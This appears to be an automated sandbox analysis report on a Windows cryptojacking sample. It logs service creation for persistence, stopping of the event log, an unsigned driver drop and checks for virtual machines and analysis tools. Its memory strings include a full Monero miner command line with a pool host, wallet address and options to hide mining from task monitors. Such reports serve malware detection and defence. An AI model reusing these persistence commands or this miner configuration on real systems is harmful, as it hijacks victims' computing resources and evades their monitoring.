Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"

Source: C:\Users\user\Desktop\LfHJdrALlh.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: LfHJdrALlh.exe

ReversingLabs: Detection: 65%

Source: C:\Users\user\Desktop\LfHJdrALlh.exe

File read: C:\Users\user\Desktop\LfHJdrALlh.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\LfHJdrALlh.exe "C:\Users\user\Desktop\LfHJdrALlh.exe"
Source: C:\Users\user\Desktop\LfHJdrALlh.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "DQKVOCSM"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LfHJdrALlh.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "DQKVOCSM" binpath= "C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe" start= "auto"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LfHJdrALlh.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\Desktop\LfHJdrALlh.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "DQKVOCSM"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe
Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe	Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\Desktop\LfHJdrALlh.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "DQKVOCSM"	Jump to behavior
Source: C:\Users\user\Desktop\LfHJdrALlh.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "DQKVOCSM" binpath= "C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe" start= "auto"	Jump to behavior
Source: C:\Users\user\Desktop\LfHJdrALlh.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog	Jump to behavior
Source: C:\Users\user\Desktop\LfHJdrALlh.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "DQKVOCSM"	Jump to behavior
Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe	Jump to behavior
Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe	Process created: C:\Windows\explorer.exe explorer.exe	Jump to behavior

Source: C:\Users\user\Desktop\LfHJdrALlh.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: LfHJdrALlh.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: LfHJdrALlh.exe

Static file information: File size 2623488 > 1048576

Source: LfHJdrALlh.exe

Static PE information: Raw size of .data is bigger than: 0x100000 < 0x277800

Source: LfHJdrALlh.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Source: LfHJdrALlh.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: LfHJdrALlh.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: LfHJdrALlh.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: LfHJdrALlh.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: LfHJdrALlh.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: LfHJdrALlh.exe	Static PE information: section name: .00cfg
Source: ograohtgkfie.exe.0.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\LfHJdrALlh.exe	Code function: 0_2_00007FF612D31394 push qword ptr [00007FF612D3A004h]; ret	0_2_00007FF612D31403
Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe	Code function: 9_2_00007FF621A91394 push qword ptr [00007FF621A9A004h]; ret	9_2_00007FF621A91403
Source: C:\Windows\System32\conhost.exe	Code function: 11_2_0000000140001394 push qword ptr [0000000140008004h]; ret	11_2_0000000140001403

Persistence and Installation Behavior

Sample is not signed and drops a device driver

Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe

File created: C:\Windows\TEMP\xvkjzlkkmfrj.sys

Jump to behavior

Source: C:\Users\user\Desktop\LfHJdrALlh.exe	File created: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe			Jump to dropped file
Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe	File created: C:\Windows\Temp\xvkjzlkkmfrj.sys			Jump to dropped file

Source: C:\Users\user\Desktop\LfHJdrALlh.exe

File created: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe

Jump to dropped file

Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe

File created: C:\Windows\Temp\xvkjzlkkmfrj.sys

Jump to dropped file

Source: C:\Users\user\Desktop\LfHJdrALlh.exe

Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "DQKVOCSM"

Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Windows\explorer.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: explorer.exe, 0000000C.00000002.4486706157.0000000001355000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.4486146482.0000000000639000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSHACKER.EXE
Source: explorer.exe, 0000000C.00000002.4486146482.0000000000639000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE1
Source: explorer.exe, 0000000C.00000002.4486146482.00000000005E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
Source: explorer.exe, 0000000C.00000002.4486146482.00000000005E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE^L
Source: explorer.exe, 0000000C.00000002.4486146482.00000000005E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _EXPLORER.EXE--ALGO=RX/0--URL=XMR-EU1.NANOPOOL.ORG:10343--USER=43BPSBHAKF7EPCJ3G1HUHUAPLUKVGEVGNEVG51BYPJHEUPBLXXFACXH1CBEAGDVXUF2IFIBRBS9DJRGP7XZJF7ZIRAHRFMG--PASS=--CPU-MAX-THREADS-HINT=50--CINIT-WINRING=XVKJZLKKMFRJ.SYS--RANDOMX-NO-RDMSR--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-VERSION=3.4.1--TLS--CINIT-IDLE-WAIT=5--CINIT-IDLE-CPU=100--CINIT-ID=EYBKNKETVFIGHKQEUV
Source: explorer.exe, 0000000C.00000002.4486146482.0000000000639000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSHACKER.EXEG
Source: explorer.exe, 0000000C.00000002.4486706157.0000000001355000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSHACKER.EXEBUFFERTEM
Source: explorer.exe, 0000000C.00000002.4486146482.00000000005E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: --ALGO=RX/0 --URL=XMR-EU1.NANOPOOL.ORG:10343 --USER="43BPSBHAKF7EPCJ3G1HUHUAPLUKVGEVGNEVG51BYPJHEUPBLXXFACXH1CBEAGDVXUF2IFIBRBS9DJRGP7XZJF7ZIRAHRFMG" --PASS="" --CPU-MAX-THREADS-HINT=50 --CINIT-WINRING="XVKJZLKKMFRJ.SYS" --RANDOMX-NO-RDMSR --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-VERSION="3.4.1" --TLS --CINIT-IDLE-WAIT=5 --CINIT-IDLE-CPU=100 --CINIT-ID="EYBKNKETVFIGHKQE"
Source: explorer.exe, 0000000C.00000002.4486146482.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.4486146482.0000000000639000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE

Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe

Dropped PE file which has not been started: C:\Windows\Temp\xvkjzlkkmfrj.sys

Jump to dropped file

Source: C:\Users\user\Desktop\LfHJdrALlh.exe	API coverage: 3.4 %
Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe	API coverage: 3.4 %
Source: C:\Windows\System32\conhost.exe	API coverage: 0.9 %

Source: C:\Windows\explorer.exe TID: 5764	Thread sleep count: 47 > 30			Jump to behavior
Source: C:\Windows\explorer.exe TID: 5764	Thread sleep count: 99 > 30			Jump to behavior

Source: C:\Windows\explorer.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: explorer.exe, 0000000C.00000002.4486146482.00000000005A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW O`%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 0000000C.00000002.4486146482.00000000005FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWSp
Source: explorer.exe, 0000000C.00000002.4486146482.00000000005FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Windows\explorer.exe

Process information queried: ProcessInformation

Jump to behavior

